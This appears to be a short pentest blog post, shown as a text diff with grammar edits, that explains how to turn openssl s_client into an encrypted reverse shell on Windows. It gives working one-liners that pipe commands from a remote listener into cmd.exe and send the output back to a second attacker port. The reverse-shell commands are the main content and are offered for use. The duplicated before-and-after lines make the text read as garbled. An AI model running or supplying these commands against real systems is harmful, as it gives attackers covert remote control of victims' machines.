Today I am going to write about openssl as an alternative to create reverse shell as the help for your pentest journey.

 openssl s_client -quiet -connect 192.168.10.7:9999 | cmd.exe

-So when the client connected and receive text will be piped to cmd.exe that would be run as cmd command.
-It will be like below if you send “dir” from the server. the client will run the command dir and out put them into the console
+So when the client connected and received text, it will be piped to cmd.exe, which would be run as a cmd command.
+It will be like below if you send “dir” from the server. the client will run the command dir and output them into the console

-It is cool right.
-So next how to get the out put back to the server so it would behave like reverse shell.
-We know that with the pipe functionality above is basically we can direct the out of a process into other process.
-So we can direct the cmd output into openssl. but since openssl connection is not multi threaded so we have to create two server and two client
+It is incredible, right.
+Next, get the output back to the server so it would behave like a reverse shell.
+We know that we can direct them out of a process into another process with the pipe functionality above.
+So we can control the cmd output into openssl. but since openssl connection is not multi-threaded, so we have to create two servers and two client

-in the above sample, I created two openssl server that are running on port 73 and 74 with the expectation that one is to send the command to the client and one is to receive the result from the client
+in the above sample, I made two openssl server that is running on port 73 and 74 with the expectation that one is to send the command to the client and one is to receive the result from the client

 then in the client you can create a client connectin with below arrangement

 openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]